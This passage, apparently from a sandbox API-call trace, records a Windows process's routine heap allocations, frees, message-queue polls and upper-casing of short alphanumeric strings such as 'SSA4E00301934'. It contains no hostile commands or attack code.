Size=0x4) returned 0x24b16e8 [0264.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0264.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0264.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0264.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0264.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0264.130] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0264.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0264.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0264.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.131] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0264.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0264.131] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0264.131] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0264.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0264.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0264.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0264.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0264.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0264.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0264.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0264.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.132] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0264.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0264.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0264.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0264.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0264.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0264.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0264.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0264.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.133] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0264.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0264.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0264.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0264.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0264.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0264.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0264.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0264.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0264.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0264.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.134] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0264.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0264.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0264.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0264.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0264.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0264.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0264.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0264.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0264.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0264.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.135] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0264.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0264.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0264.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0264.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0264.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0264.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0264.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0264.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0264.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.136] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0264.136] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0264.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1a0 [0264.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0264.136] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0264.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0264.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0264.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0264.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0264.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0264.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.137] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0264.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0264.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0264.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0264.137] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0264.137] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0264.138] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0264.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0c8 [0264.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0264.138] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0264.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0264.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0264.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0264.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0264.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0264.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0264.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.138] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0264.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0264.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0264.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0264.139] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0264.139] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0264.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0264.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0264.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0264.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0264.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0264.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0264.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0264.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0264.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0264.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0264.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0264.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0264.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0264.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0264.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0264.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0264.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0264.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0264.141] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0264.141] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.141] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0264.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.141] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.141] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0264.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0264.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.142] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0264.142] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: 